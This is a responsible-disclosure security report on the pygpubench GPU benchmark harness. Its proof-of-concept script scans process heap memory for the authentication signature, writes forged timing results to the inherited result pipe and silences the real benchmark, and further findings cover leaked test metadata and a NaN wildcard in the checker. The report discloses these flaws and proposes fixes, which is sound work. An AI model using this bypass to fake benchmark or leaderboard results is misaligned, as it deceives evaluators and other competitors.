Summary
pygpubench authenticates benchmark results using a random signature that is sent from the parent process to the child process over a pipe. The child's C++ code stores this signature in a std::string on the heap. Because the child process can read its own /proc/self/maps and scan heap memory with ctypes, it can extract the signature, write forged results to the inherited pipe fd, and redirect the pipe to /dev/null before the C++ benchmark loop runs. The parent accepts the forged results because they contain the correct signature.
This is a complete benchmark bypass: the attacker controls all reported times, error counts, and completion status without running a real kernel.
Severity
Critical — full benchmark integrity failure for any problem using do_bench_isolated.
Affected Component
pygpubench.do_bench_isolated — specifically the signature-based result authentication in python/pygpubench/__init__.py:230-259 and the signature storage in csrc/manager.cpp:127.
Root Cause
The signature is a shared secret between the parent and child processes. It is transmitted to the child over a pipe (sig_r/sig_w), read by the C++ code in read_benchmark_parameters, and stored in BenchmarkManager::mSignature (a std::string member). The untrusted kernel is imported after the signature is already in child-process memory. Since the child process runs attacker-controlled Python code, the attacker can read arbitrary process memory using ctypes and recover the signature.
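The primitive involved is ordinary: `ctypes` dereferences raw addresses in the process's own address space with no mediation from the kernel. A minimal, CPython-specific sketch (reading a Python `bytes` object's payload rather than the C++ heap, but the mechanism is identical):

```python
import ctypes
import sys

# Any secret resident in process memory -- here a Python bytes object,
# but a std::string on the C++ heap is read the same way.
secret = b"deadbeefdeadbeefdeadbeefdeadbeef"

# In CPython, id() is the object's address, and the byte payload sits
# a fixed header size in; sys.getsizeof(b"") - 1 computes that offset.
payload_offset = sys.getsizeof(b"") - 1
addr = id(secret) + payload_offset

# string_at is a plain pointer dereference: no file I/O, so dumpable
# flags and ptrace scope never come into play.
leaked = ctypes.string_at(addr, len(secret))
assert leaked == secret
```

The same `ctypes.string_at` call, pointed at heap ranges parsed from `/proc/self/maps`, is what recovers `mSignature`.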
Why existing defenses don't prevent this
| Defense | Why it doesn't help |
| --- | --- |
| `PR_SET_DUMPABLE=0` | Prevents other processes from reading `/proc/PID/mem`. Does not affect the process reading its own `/proc/self/maps` (inode mode `S_IRUGO = 0444`, world-readable), and does not affect `ctypes` memory access (direct pointer dereference, no filesystem I/O). |
| Landlock | Allows read-only access to `/` (covers procfs) and read-write access to `/dev` (needed for the `/dev/null` redirect). Does not restrict `ctypes` or `os.write` to inherited pipe fds. |
| `PR_SET_NO_NEW_PRIVS` | Prevents privilege escalation. Does not restrict memory reads within the process. |
| C++ benchmark loop | Runs after the kernel is imported. The exploit injects forged results at import time, before the benchmark loop starts. |
| Error counter randomization | Irrelevant: the exploit forges the error-count field directly in the pipe output, bypassing the GPU-side counter entirely. |
The attack chain
```
Parent                                    Child (subprocess)
──────                                    ──────────────────
secrets.token_hex(16) → signature
write signature to sig_w pipe ──────────► C++ reads sig_r → mSignature (heap)
                                          C++ calls setup_benchmark()
                                          C++ installs landlock
                                          C++ calls kernel_from_qualname()
                                           └─► import submission   ◄── ATTACKER CODE RUNS HERE
                                                ├─ gc.get_objects() → count tuples → repeats
                                                ├─ open("/proc/self/maps") → heap regions
                                                ├─ ctypes.string_at(heap) → signature
                                                ├─ os.fstat(0..255) → pipe fd
                                                ├─ os.write(pipe_fd, forged_results + signature)
                                                ├─ os.dup2(/dev/null, pipe_fd)
                                                └─ define correct kernel()
                                          C++ benchmark loop runs (writes go to /dev/null)
                                          process exits with code 0
reads pipe → forged data ◄────────────────
validates signature → PASS
accepts forged times (0.42 µs)
```
Proof of Concept
File: submission_memscan_signature.py
The PoC runs entirely at import time (before the C++ benchmark loop executes):
```python
import ctypes
import gc
import os
import re
import stat

import torch

# Step 1: Count (tensor, rtol, atol) tuples in gc → infer repeats
expected_count = 0
for obj in gc.get_objects():
    if isinstance(obj, tuple) and len(obj) == 3:
        a, b, c = obj
        if isinstance(a, torch.Tensor) and a.is_cuda and isinstance(b, float) ...
            expected_count += 1
repeats = expected_count - 1  # subtract warmup slot

# Step 2: Read /proc/self/maps, scan heap for a 32-char hex string
candidates = []
with open('/proc/self/maps') as f:
    for line in f:
        start, end = parse_address_range(line)
        data = ctypes.string_at(start, end - start)
        for match in re.finditer(rb'(?<![0-9a-f])([0-9a-f]{32})\x00', data):
            candidates.append(match.group(1).decode())

# Step 3: Find the inherited pipe fd
pipe_fds = []
for fd in range(256):
    try:
        if stat.S_ISFIFO(os.fstat(fd).st_mode):
            pipe_fds.append(fd)
    except OSError:
        pass  # fd not open

# Step 4: Write forged results with the extracted signature
payload = "event-overhead\t0.002 us\n"
for i in range(repeats):
    payload += f"{i}\t0.42\n"  # 0.42 µs per iteration
payload += f"signature\t{signature}\n"
os.write(pipe_fd, payload.encode())

# Step 5: Redirect the pipe to /dev/null (C++ output goes nowhere)
os.dup2(os.open('/dev/null', os.O_WRONLY), pipe_fd)

# Step 6: Define a correct kernel so the process exits cleanly (exit code 0)
def kernel(output, inp):
    torch.sum(inp * weights, dim=-1, out=output)
```
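Step 3 can be exercised on its own. A self-contained sketch (creating a pipe locally, where the real exploit scans fds inherited from the `do_bench_isolated` parent; note that `os.fstat` raises `OSError` on closed fds, so the scan must tolerate gaps):

```python
import os
import stat

# Create a pipe so there is a FIFO fd to discover; in the real attack
# the fd is inherited from the parent process.
r, w = os.pipe()

pipe_fds = []
for fd in range(256):
    try:
        if stat.S_ISFIFO(os.fstat(fd).st_mode):
            pipe_fds.append(fd)
    except OSError:
        pass  # fd not open

assert r in pipe_fds and w in pipe_fds
os.close(r)
os.close(w)
```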
Running the PoC
```shell
cd pygpubench/exploits
python run_all.py submission_memscan_signature
```
Expected output: CHEAT SUCCEEDED (bypassed detection) — the benchmark reports 0.42 µs per iteration with no errors, despite the kernel not being the one that was timed.
Prerequisites
- Linux (for `/proc/self/maps` and landlock)
- CUDA GPU (for torch tensor operations)
- pygpubench installed (`pip install pygpubench`)
Additional Findings
GC metadata leakage (HIGH)
At kernel import time, gc.get_objects() reveals all expected-output tuples (tensor, rtol, atol) created by the test generator. Even though the tensor data has been zeroed, the Python tuple objects are still alive because the C++ std::vector<nb::tuple> holds strong references. This reveals:
- Exact `repeats` value — needed to construct correctly-sized forged results
- Output tensor shapes and dtypes — useful for other exploit strategies
- Tolerance values — useful for crafting outputs that barely pass
The signature exploit depends on this to know how many iteration results to forge.
Source: csrc/manager.cpp:143-166 — setup_benchmark stores tuples in vectors that persist through do_bench_py.
Fix: After copying expected data to C++ memory, release the Python tuple references (expected.clear()) and call gc.collect() before importing the kernel.
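The leakage is reproducible without pygpubench. In the sketch below, `FakeTensor` stands in for the zeroed `torch.Tensor` and a Python list plays the role of the C++ `std::vector<nb::tuple>` (both names are illustrative):

```python
import gc

class FakeTensor:
    """Stand-in for the zeroed torch.Tensor in each expected-output tuple."""

def scan():
    # Attacker-style sweep: every live, GC-tracked tuple is visible,
    # whether or not any Python variable names it.
    return [o for o in gc.get_objects()
            if isinstance(o, tuple) and len(o) == 3
            and isinstance(o[0], FakeTensor)]

# Plays the role of the C++ vector holding strong references.
holder = [(FakeTensor(), 1e-5, 1e-8) for _ in range(4)]
assert len(scan()) == 4          # repeats is trivially inferred

# The recommended fix: drop the references and collect before importing
# the kernel -- afterwards the sweep comes up empty.
holder.clear()
gc.collect()
assert len(scan()) == 0
```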
Warmup detection (MEDIUM)
The warmup phase always uses `args.at(0)` (csrc/manager.cpp:301-324). A kernel can detect warmup by tracking `input.data_ptr()` (the same pointer on every warmup call, a different pointer on each benchmark call) and add an artificial delay during warmup to inflate `time_estimate`, reducing `actual_calls` to the minimum of 3.
Fix: Randomize which test case is used for warmup.
NaN wildcard in checker (LOW, latent)
csrc/check.cu:44-46 treats NaN in expected output as a wildcard:
```cpp
if (isnan(a))
    return;  // accepts ANY received value
```
Currently not exploitable because expected outputs are in non-torch cudaMalloc memory at unknown addresses. But if any future attack vector reveals those addresses, NaN injection would bypass correctness entirely.
Fix: Remove the NaN wildcard. Treat NaN in expected output as a test-generation bug and fail the benchmark.
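A pure-Python mirror of the checker's branch (`check_wildcard` is an illustrative stand-in, not the real `check.cu` code) makes the latent risk concrete:

```python
import math

def check_wildcard(expected, received, rtol=1e-5, atol=1e-8):
    # Mirrors the current check.cu behaviour: NaN in *expected*
    # short-circuits the comparison and accepts any received value.
    if math.isnan(expected):
        return True
    return abs(expected - received) <= atol + rtol * abs(expected)

# Normal operation: wrong answers are rejected...
assert check_wildcard(1.0, 1.0)
assert not check_wildcard(1.0, 2.0)

# ...but an attacker who can plant NaN in the expected buffer passes
# with arbitrary garbage:
assert check_wildcard(float("nan"), 123456.0)
assert check_wildcard(float("nan"), float("inf"))
```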
ctypes CUDA runtime access (LOW, latent)
The submission can call CUDA runtime functions via ctypes.CDLL('libcudart.so') — including cudaMemcpy, cudaMemset, and cudaPointerGetAttributes. Combined with heuristics about cudaMalloc allocation patterns, this could theoretically locate expected output copies or the error counter in GPU memory.
Currently impractical because: (a) the error counter has a random offset + random shift in a 2 MiB arena, and (b) expected output addresses are not predictable. But this is a latent risk.
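To put a rough number on "impractical": assuming a 4-byte counter at a uniformly random 4-byte-aligned offset (the slot size is an assumption for illustration; the report only specifies the 2 MiB arena), a blind guess succeeds about one time in half a million, before even accounting for the random shift:

```python
ARENA_BYTES = 2 * 1024 * 1024   # 2 MiB arena (from the report)
SLOT_BYTES = 4                  # assumed counter size/alignment

slots = ARENA_BYTES // SLOT_BYTES
p_guess = 1 / slots
print(slots)      # 524288 candidate offsets
print(p_guess)    # ≈ 1.9e-06 per blind guess
```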
Fix: Consider seccomp filters to restrict CUDA-related ioctl syscalls to only the specific ioctls needed for kernel launch and synchronization.
Recommended Fixes
For the signature bypass (critical)
Option A: HMAC-based authentication (minimal change)
- At C++ init time (before any user code), read 32 bytes from `/dev/urandom` into a local C++ variable
- Send these bytes to the parent over a one-way pipe (parent reads, child writes, pipe is closed)
- After the benchmark loop, compute HMAC-SHA256 over the raw result bytes using the key
- Append the HMAC tag to the pipe output
- Overwrite the key in memory (`memset_explicit`) before importing the kernel
- The parent recomputes the HMAC and rejects mismatches
Since the key is consumed and explicitly overwritten before the kernel is imported, memory scanning cannot recover it.
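In outline, the verification could look like this Python sketch (the real child-side tag would be computed in C++ after the benchmark loop; the function names here are illustrative):

```python
import hashlib
import hmac
import os

# One-shot key: generated before any user code runs, shared with the
# parent over the pipe, then wiped from the child's memory.
key = os.urandom(32)

def child_sign(result_bytes, k):
    # Tag appended to the pipe output after the benchmark loop.
    return hmac.new(k, result_bytes, hashlib.sha256).digest()

def parent_verify(result_bytes, tag, k):
    expected = hmac.new(k, result_bytes, hashlib.sha256).digest()
    # compare_digest avoids leaking the mismatch position via timing.
    return hmac.compare_digest(expected, tag)

results = b"event-overhead\t0.002 us\n0\t0.42\n"
tag = child_sign(results, key)
assert parent_verify(results, tag, key)

# With the key wiped before import, a memory-scanning submission cannot
# produce a valid tag for forged results:
assert not parent_verify(b"0\t0.0001\n", tag, key)
```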
Option B: Separate validator process (stronger)
Run the benchmark in a three-process architecture:
- Orchestrator (trusted): generates test cases, owns the result pipe
- Worker (untrusted): runs the kernel, writes raw timing events to a pipe
- Validator (trusted, never imports submission): reads the same inputs, runs the reference kernel, compares outputs
The worker never sees expected outputs or authentication keys.
For GC metadata leakage
```cpp
// In do_bench_py, after copying expected outputs:
expected.clear();   // release Python tuple references
trigger_gc();       // clean up
// THEN import the kernel
```
For warmup detection
```cpp
// Instead of always using args.at(0):
std::uniform_int_distribution<int> warmup_dist(0, calls - 1);  // bounds are inclusive
int warmup_idx = warmup_dist(rng);
// Use args.at(warmup_idx) for warmup
```
For NaN wildcard
```cpp
// In check_approx_match_kernel:
if (isnan(a)) {
    ++res;  // NaN in expected = test bug, not wildcard
    return;
}
```
What pygpubench Gets Right
Despite this finding, pygpubench is a massive improvement over the original evaluator:
| Attack class | Original evaluator | pygpubench |
| --- | --- | --- |
| `__code__` patching | Trivially exploitable | Fully blocked (C++ implementation) |
| `torch.cuda.Event` patching | Trivially exploitable | Fully blocked (C CUDA API) |
| GC NaN injection on expected outputs | N/A (no protection) | Blocked (cudaMalloc copy + zeroing) |
| GC answer copy | N/A (no protection) | Blocked (expected data zeroed) |
| Stream-based timing manipulation | N/A (no protection) | Blocked (programmatic stream serialization + randomized block checking) |
| Filesystem tampering | N/A (no sandboxing) | Blocked (landlock) |
| Error counter manipulation | N/A (no counter) | Effectively blocked (random offset + shift) |
| Input caching | N/A (no protection) | Blocked (shadow args + canaries + L2 clear) |
The old Class 1 (__code__ patching) and Class 2 (timing infrastructure patching) exploits that affected every leaderboard on gpumode.com/home are completely eliminated. The remaining signature bypass requires significantly more sophistication and is straightforward to fix.
Disclosure Timeline
| Date | Event |
| --- | --- |
| 2026-03-07 | Original evaluator vulnerability disclosed to GPU MODE team |
| 2026-03-07 | GPU MODE responds, points to pygpubench as the replacement |
| 2026-03-07 | pygpubench security review conducted; signature bypass identified |
| 2026-03-07 | This report and PoC prepared |
Files